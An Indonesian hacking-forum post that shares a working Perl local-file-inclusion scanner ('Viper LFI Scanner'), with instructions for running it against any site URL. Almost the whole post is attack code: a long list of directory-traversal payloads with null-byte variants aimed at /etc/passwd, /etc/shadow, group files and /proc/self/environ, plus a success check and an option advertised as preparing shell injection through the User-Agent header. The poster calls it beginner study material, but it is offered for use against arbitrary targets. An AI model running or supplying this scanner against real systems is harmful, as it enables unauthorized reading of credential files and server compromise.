07-25-2012, 07:33 AM
Assalamualaikum all, pengguna baru numpang lewat...
cuma mau share script perl untuk scan LFI, meskipun banyak orang yang bilang Vuln seperti ini sdah jarang ditemukan, tapi tidak apalah untuk bahan pembelajaran untuk pemula seperti saya..
cuma mau share script perl untuk scan LFI, meskipun banyak orang yang bilang Vuln seperti ini sdah jarang ditemukan, tapi tidak apalah untuk bahan pembelajaran untuk pemula seperti saya..
Quote: # Author: Bl4ck.ViperJika anda menemukan Vuln pada target yang anda scan, Silahkan berkreasi sendiri soalnya ane juga masih pengguna baru masih belum terlalu paham :apn:
# From : Azarbycan
# Category : Scanner
# Home : http://www.Skote-vahshat.com
# Emails : [email protected] , [email protected] , [email protected]
#
#
# Description :Log , Environ , Passwd File Scanner ,& new method for bypass passwd
Code:#!/usr/bin/perl
#
# ////////////////////////////////////
# Viper LFI Scanner Ver. 4.0
# ////////////////////////////////////
#
# Title : Viper Lfi Scanner Ver. 4.0
# Author: Bl4ck.Viper
# From : Azarbycan
# Category : Scanner
# Home : www.Skote-vahshat.com
# Emails : [email protected] , [email protected] , [email protected]
#
#
# Description :Log , Environ , Passwd File Scanner ,& new method for bypass passwd
#
#
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
use HTTP::Request;
use LWP::UserAgent;
system ("cls");
print "\t\t/////////////////////////////////////////////////\n";
print "\t\t_________________________________________________\n";
print "\t\t\t Viper LFI Scanner Ver. 3.0\n";
print "\t\t\t Coded By Bl4ck.Viper\n";
print "\t\t\t Made In Azarbycan\n";
print "\t\t\t Version In English\n";
print "\t\t_________________________________________________\n";
print "\n\n";
sleep (1);
print "\t\t\t\t WELCOME\n";
print "\n\n";
menu:;
print "\tMenu:\n";
print "\t ID[1]=>Passwd,Log";
print "\t[Scan Files Of /etc/ Directory]\n";
print "\t ID[2]=>Environ";
print "\t\t[Scan Environ File For Inject Shell By U-Agent]\n";
print"\n";
print "\t\t Select ID For Start Scanner :";
$menu = <>;
if ($menu =~ /1/){
goto lfi;
}
if ($menu =~ /2/){
goto env;
}
else {
print"\n\n";
print "\t\tUnknow Command\n";
goto menu;
};
lfi:;
print "\n\n";
print "\t\t\tWelcome To /etc/ Section With New Method\n\n";
print "\t Insert Target (ex: http://www.site.com/index.php?page=)\n";
print "\t Target :";
$host=<STDIN>;
chomp($host);
if($host !~ /http:\/\//) { $host = "http://$host"; };
print "\n\n";
print "\t\t*-*-*-*-*-* WORKING IN PROGRESS *-*-*-*-*-*\n";
print "\n\n";
@lfi = ('../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../../etc/passwd',
'....//etc/passwd',
'....//....//etc/passwd',
'....//....//....//etc/passwd',
'....//....//....//....//etc/passwd',
'....//....//....//....//....//etc/passwd',
'....//....//....//....//....//....//etc/passwd',
'....//....//....//....//....//....//....//etc/passwd',
'....//....//....//....//....//....//....//....//etc/passwd',
'....//....//....//....//....//....//....//....//....//etc/passwd',
'....//....//....//....//....//....//....//....//....//....//etc/passwd',
'../../etc/passwd%00',
'../../../etc/passwd%00',
'../../../../etc/passwd%00',
'../../../../../etc/passwd%00',
'../../../../../../etc/passwd%00',
'../../../../../../../etc/passwd%00',
'../../../../../../../../etc/passwd%00',
'../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../../../etc/passwd%00',
'....//etc/passwd%00',
'....//....//etc/passwd%00',
'....//....//....//etc/passwd%00',
'....//....//....//....//etc/passwd%00',
'....//....//....//....//....//etc/passwd%00',
'....//....//....//....//....//....//etc/passwd%00',
'....//....//....//....//....//....//....//etc/passwd%00',
'....//....//....//....//....//....//....//....//etc/passwd%00',
'....//....//....//....//....//....//....//....//....//etc/passwd%00',
'....//....//....//....//....//....//....//....//....//....//etc/passwd%00',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../../etc/shadow',
'../etc/shadow%00',
'../../etc/shadow%00',
'../../../etc/shadow%00',
'../../../../etc/shadow%00',
'../../../../../etc/shadow%00',
'../../../../../../etc/shadow%00',
'../../../../../../../etc/shadow%00',
'../../../../../../../../etc/shadow%00',
'../../../../../../../../../etc/shadow%00',
'../../../../../../../../../../etc/shadow%00',
'../../../../../../../../../../../etc/shadow%00',
'../../../../../../../../../../../../etc/shadow%00',
'../../../../../../../../../../../../../etc/shadow%00',
'../../../../../../../../../../../../../../etc/shadow%00',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../../etc/group',
'../etc/group%00',
'../../etc/group%00',
'../../../etc/group%00',
'../../../../etc/group%00',
'../../../../../etc/group%00',
'../../../../../../etc/group%00',
'../../../../../../../etc/group%00',
'../../../../../../../../etc/group%00',
'../../../../../../../../../etc/group%00',
'../../../../../../../../../../etc/group%00',
'../../../../../../../../../../../etc/group%00',
'../../../../../../../../../../../../etc/group%00',
'../../../../../../../../../../../../../etc/group%00',
'../../../../../../../../../../../../../../etc/group%00',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'../etc/security/group%00',
'../../etc/security/group%00',
'../../../etc/security/group%00',
'../../../../etc/security/group%00',
'../../../../../etc/security/group%00',
'../../../../../../etc/security/group%00',
'../../../../../../../etc/security/group%00',
'../../../../../../../../etc/security/group%00',
'../../../../../../../../../etc/security/group%00',
'../../../../../../../../../../etc/security/group%00',
'../../../../../../../../../../../etc/security/group%00',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../../etc/security/passwd',
'../etc/security/passwd%00',
'../../etc/security/passwd%00',
'../../../etc/security/passwd%00',
'../../../../etc/security/passwd%00',
'../../../../../etc/security/passwd%00',
'../../../../../../etc/security/passwd%00',
'../../../../../../../etc/security/passwd%00',
'../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../../../../../../etc/security/passwd%00',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../../etc/security/user',
'../etc/security/user%00',
'../../etc/security/user%00',
'../../../etc/security/user%00',
'../../../../etc/security/user%00',
'../../../../../etc/security/user%00',
'../../../../../../etc/security/user%00',
'../../../../../../../etc/security/user%00',
'../../../../../../../../etc/security/user%00',
'../../../../../../../../../etc/security/user%00',
'../../../../../../../../../../etc/security/user%00',
'../../../../../../../../../../../etc/security/user%00',
'../../../../../../../../../../../../etc/security/user%00',
'../../../../../../../../../../../../../etc/security/user%00');
foreach $scan(@lfi){
$url = $host.$scan;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
if ($response->is_success && $response->content =~ /root:x:/) { $msg = Vulnerability;}
else { $msg = "Not Found";}
print "$scan..........[$msg]\n";
}
env:;
print "\n\n";
print "\t\t\tWelcom To Environ Section\n\n";
print "\t Insert Target (ex: http://www.site.com/index.php?page=)\n";
print "\t Target :";
$host=<STDIN>;
chomp($host);
if($host !~ /http:\/\//) { $host = "http://$host"; };
print "\n\n";
print "\t\t*-*-*-*-*-* WORKING IN PROGRESS *-*-*-*-*-*\n";
print "\n\n";
@env = ('../proc/self/environ',
'../../proc/self/environ',
'../../../proc/self/environ',
'../../../../proc/self/environ',
'../../../../../proc/self/environ',
'../../../../../../proc/self/environ',
'../../../../../../../proc/self/environ',
'../../../../../../../../proc/self/environ',
'../../../../../../../../../proc/self/environ',
'../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../../proc/self/environ',
'../proc/self/environ%00',
'../../proc/self/environ%00',
'../../../proc/self/environ%00',
'../../../../proc/self/environ%00',
'../../../../../proc/self/environ%00',
'../../../../../../proc/self/environ%00',
'../../../../../../../proc/self/environ%00',
'../../../../../../../../proc/self/environ%00',
'../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../../../../../proc/self/environ%00');
foreach $scan_env(@env){
$url = $host.$scan_env;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
if ($response->is_success && $response->content =~ /HTTP_ACCEPT/ && $response->content =~ /HTTP_HOST/) { $msg = Vulnerability;}
else { $msg = "Not Found";}
print "$scan_env..........[$msg]\n";
}
# Bl4ck.Viper Turkish Hacker
# Copyright 2010 Black Viper
cara penggunaan :
- Copy dan save Script di atas dengan extension .pl (nama sesuai selera anda)
- Cari target misalnya ini: http://www.target.com/index.php?page=
- Jalankan script diatas dengan perintah :
maka akan muncul 2 pilihan, Pilihan pertama untuk mencari direktori /etc/passwd, /etc/group, dll. Pilihan yang kedua Scanning Environ File For Inject Shell By U-Agent. Contoh :Code:root@bt:~$ perl (nama_file_anda).pl
Code:root@ubuntux:~$ perl lfiscanner.pl
/////////////////////////////////////////////////
_________________________________________________
Viper LFI Scanner Ver. 3.0
Coded By Bl4ck.Viper
Made In Azarbycan
Version In English
_________________________________________________
WELCOME
Menu:
ID[1]=>Passwd,Log [Scan Files Of /etc/ Directory]
ID[2]=>Environ [Scan Environ File For Inject Shell By U-Agent]
Select ID For Start Scanner :2
Welcom To Environ Section
Insert Target (ex: http://www.site.com/index.php?page=)
Target : http://www.target.com/index.php?page=- Sekarang silahkan tunggu sampai ada pesan success atau vulnerability, jika not found brarti tidak ditemukannya bug LFI pada website target tsb.
Spoiler! :